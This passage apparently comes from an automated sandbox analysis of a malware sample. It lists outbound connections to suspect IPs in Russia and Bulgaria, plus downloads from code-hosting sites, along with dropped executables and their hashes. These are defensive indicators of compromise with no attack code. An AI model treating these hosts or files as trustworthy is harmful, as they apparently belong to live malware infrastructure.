| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 54.231.196.25:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.196.231.54.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| GB | 88.221.134.18:80 | tcp | |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 173.231.16.77:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 77.16.231.173.in-addr.arpa | udp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
Files
memory/1276-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3440-1-0x0000000003ED0000-0x0000000003EE6000-memory.dmp
memory/1276-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9CFB.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2492-12-0x0000000001220000-0x0000000001272000-memory.dmp
memory/2492-17-0x00000000746D0000-0x0000000074E80000-memory.dmp
memory/2492-18-0x0000000006080000-0x0000000006624000-memory.dmp
memory/2492-19-0x00000000059E0000-0x0000000005A72000-memory.dmp
memory/2492-20-0x0000000005B90000-0x0000000005BA0000-memory.dmp
memory/2492-21-0x0000000005AA0000-0x0000000005AAA000-memory.dmp
memory/2492-23-0x0000000007010000-0x0000000007628000-memory.dmp
memory/2492-24-0x0000000008890000-0x000000000899A000-memory.dmp
memory/2492-25-0x0000000006EF0000-0x0000000006F02000-memory.dmp
memory/2492-26-0x0000000006F50000-0x0000000006F8C000-memory.dmp
memory/2492-27-0x0000000006FA0000-0x0000000006FEC000-memory.dmp
memory/2492-28-0x00000000094B0000-0x0000000009516000-memory.dmp
memory/2492-29-0x000000000A3C0000-0x000000000A582000-memory.dmp
memory/2492-30-0x000000000AAC0000-0x000000000AFEC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C7C5.exe
| MD5 | f456b770bbc80b698bdd9116a4e063fc |
| SHA1 | 7ee06483fdc2b8925282a34721af9e86b916945e |
| SHA256 | 34f87435036b847dcdc8ad7c8e613daeebebed06bfd1e62322c6b2e9dc753825 |
| SHA512 | b679876ebe59832d4491a62c4c482a763bc00ba3cfd2f8af24c4cc487e997ff94729f46ae79470d1c5357893de65f9c15d70f600e07bcf30bcc9e35c84c8da2a |
C:\Users\Admin\AppData\Local\Temp\C7C5.exe
| MD5 | 1713300ba962c869477e37e4b31e40af |
| SHA1 | d5c4835bc910acccd28dbed0c451043ea8de95ef |
| SHA256 | 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d |
| SHA512 | 70b2a2b17c6b3a0a295baf536451ef38c6e9e292a3c967a9fc950a6de321bbac0dc45e942ef151ba81b717f8ede3166388e68ce75f2afff0ec16aea98ea742e1 |
memory/5092-36-0x00000000001C0000-0x000000000065E000-memory.dmp
memory/5092-35-0x00000000746D0000-0x0000000074E80000-memory.dmp
memory/5092-37-0x0000000005160000-0x00000000051FC000-memory.dmp
memory/5092-38-0x0000000005290000-0x00000000052A0000-memory.dmp
memory/2492-39-0x0000000006A80000-0x0000000006AD0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\D469.exe
| MD5 | 71133438e300594c59ad49ccccdbac93 |
| SHA1 | 4addecdd3101ba2154504296ae5fa38d67dd34f3 |
| SHA256 | ae463362701dbf13d64de6928ede6ee7bc6b10f5ee75568a46ca56d60c58b8c4 |
| SHA512 | 63a8fa99f966404420a01c122c46ea659d206ed1754da069d4e3d7837c14af6b3c104df35818eafb7c84aa665646810f6f368dec5e3590843d5c248d55cc7930 |
C:\Users\Admin\AppData\Local\Temp\D469.exe
| MD5 | bf33c990e7c7d544a59b50910502e360 |
| SHA1 | 234c5085cb77a5be787d3969eacedba3b809d58d |
| SHA256 | 8c037d12bc707e229ea667f6e93233c1b3ff513071b51010ad55f4aa1aaf627a |
| SHA512 | 61bb3759ceeba54a36e77892a0c1a014c3216a31d615b8ec46a80f18073f0f50194045b2750c59dd4e63d71271e9b7fe2ab99335eda316987e834ca655e6a491 |
memory/3128-45-0x0000000000420000-0x0000000001212000-memory.dmp
memory/3128-44-0x00000000746D0000-0x0000000074E80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c7682b9fe7adb7f9f9c239efa65211ad |
| SHA1 | 8df9ab964910cc6db9c614b5192e705235ab8b09 |
| SHA256 | c888c8693cf5d3eb474c9d62a72edcbcc37eab11ed91d711678a8ea428e75207 |
| SHA512 | 19b17ba9516eec1e2057a038fb714dea1d8345d4ca59dbdb03a539ae0c87c721327799885101aed48418c48d0956728da279449aeb558edbfff51a47611c190b |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 7a63a9d863a7c800bc9ba3e70da9664a |
| SHA1 | d41557f5faa5d3d6a17869b574f4721a827aff2c |
| SHA256 | 9406eef91ed015793bf60f5d813497788f3defcb161494ec408c7b169d3d1da2 |
| SHA512 | 06bba648fdae40f8954ccac1163b0d85e776d0087512b7e6a4f858dc2c3c91cd9a1df70a9ea16259b34e2c846e8099e44ccc47ce0f13e502c9cdc1f255304e64 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c6c53c63657293e4da62c4e7f1d1831b |
| SHA1 | a8379d445fb2226da97418f4d75bad07ef9290ca |
| SHA256 | 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf |
| SHA512 | 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | e64a9617b12f6c3ebeb356d55fa20a58 |
| SHA1 | de175104b56f2571338ba1c0dd293cbbb272d48b |
| SHA256 | 5f7b2a6094580ea67484885019f14a7c7c4c6b3abbd8921eec4937470b432be2 |
| SHA512 | fe1c76419fd0570eb7ec515b30ebe82da9e764b78133243a01905b2096c202b0f0e8ee4b1cf611f448697b25d5ad929244d5beb59295290d601ed951cf03474b |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 41fd4e22a8a49b767e464fb00b35a0af |
| SHA1 | 6c42ff1994c3c478c20e3680b8a4933bafa41dc5 |
| SHA256 | a9c9004e7244f4db028c1ac689e0662c12fef1d6ae9e48e21498edd626736819 |
| SHA512 | a0b4b22b7a1c7420d073cf2bc11526eb5856d0d061267fdd0ac958a2e77d664a7acc4014657d060e7e4ba53be142214e63d83cb0733cfcfa9f9968546ece3a82 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | ae2972e39a22195447b4bf9f64e3f0c5 |
| SHA1 | 29341d722658114c0e24583a92d352d5d6240f3a |
| SHA256 | 2bf41e85cae1d3f565d868a44e5676ed12c3febc32d1414109850eac96d22ff1 |
| SHA512 | 7a10db21061005037bdc0fbd6770d98d48b8fcc41ef4170a3d37611c0f778547d98376eb7110fe89afeb0c308c8bf245b58f2ace79765b5ca15acc405db03455 |
C:\Users\Admin\AppData\Local\Temp\nsbD6E8.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 349b8d5ad6856904983af1ca54c6dff2 |
| SHA1 | a681ec9e944834527c5c83ae21a0e86ef42a1488 |
| SHA256 | 1cafb4a8f55864b9c6d1d33eecfc8bb91cd22b1857e7e673970e9b7cad8ed645 |
| SHA512 | 7f957e6783e74be28f9821622e3de5f1b92082bef57e999d9fc484b960ba79ed9f104c0bdeeb62b3f6fddb7a7490e5905a43958a278dcf0bfca024521a3c4e76 |
memory/2492-88-0x00000000746D0000-0x0000000074E80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 4829b8d1c37259c4938784347650b8e4 |
| SHA1 | ad2b607c717d50bfbb0afee425f6d1e3c73f28e3 |
| SHA256 | 3faff80040e71993de40cc618dce4ddd833604bf61aebb2776f490cb98dd1c17 |
| SHA512 | 422c10f4c1f4b4e157fd550b2f9f253511e6e70ebfb683be83905501d65b69e502ebf1e07c6dd30588962dfcb865a9b4843b700ba70b0efda64d6eed370116cf |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | aa35e48c2f112c0045ddf5f6a4322c44 |
| SHA1 | eaa8afb4d4dc9392932c925043d4ca4d93f11c04 |
| SHA256 | 4a7b00a9bcde09f29f587230214af7138af43293d1b66ebaab19f388ec4e1400 |
| SHA512 | 960b08405d2189e0787b15437fe2608660aa308b72d8a608446170e4aec1190774795b6c287bfa6be94f698440e81e55e50e5449a2fbf2c0c34197cb3ee6e85e |
memory/516-102-0x0000000002470000-0x0000000002479000-memory.dmp
memory/2320-110-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\D91D.exe
| MD5 | dc6fbf2cd9ad1f1f0ac200e9bec7ea3f |
| SHA1 | c3af9d82d270829784339331dea63f927400e0d4 |
| SHA256 | 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590 |
| SHA512 | 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f |
memory/516-109-0x0000000000870000-0x0000000000970000-memory.dmp
memory/3492-111-0x0000000002830000-0x0000000002831000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | a045d462a33c6e835b68fc10850e230c |
| SHA1 | b503d30d952078f859a41a195f7d0b05fd4c49a3 |
| SHA256 | f548a4b0cb7309284f72cf07a973014e58c1c6d15bdfad4c065dc60dc45ca291 |
| SHA512 | e3f276b2885ffdf8e17c18b58bb35d10561c462810ff14461747a591d0c198c153199d59ec1d822ad0eb75fe0ecf57caf4daec4d8793fed66ea3fbe12b262507 |
memory/3516-100-0x0000000000400000-0x0000000000418000-memory.dmp
memory/3128-99-0x00000000746D0000-0x0000000074E80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD6E8.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\is-KBMR3.tmp\tuc3.tmp
| MD5 | f448d7f4b76e5c9c3a4eaff16a8b9b73 |
| SHA1 | 31808f1ffa84c954376975b7cdb0007e6b762488 |
| SHA256 | 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49 |
| SHA512 | f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4 |
memory/2320-113-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1832-117-0x0000000002DD0000-0x00000000036BB000-memory.dmp
memory/1832-118-0x00000000029D0000-0x0000000002DCB000-memory.dmp
memory/1832-134-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-3Q2N2.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\Temp\is-3Q2N2.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat
| MD5 | 60c9624e093baac4bef11ab4fc846111 |
| SHA1 | 07a25911c81e04608a0dc6fb065524a9da82dd65 |
| SHA256 | e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d |
| SHA512 | 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24 |
memory/4264-136-0x0000000000610000-0x0000000000611000-memory.dmp
memory/2828-171-0x00007FFE09580000-0x00007FFE0A041000-memory.dmp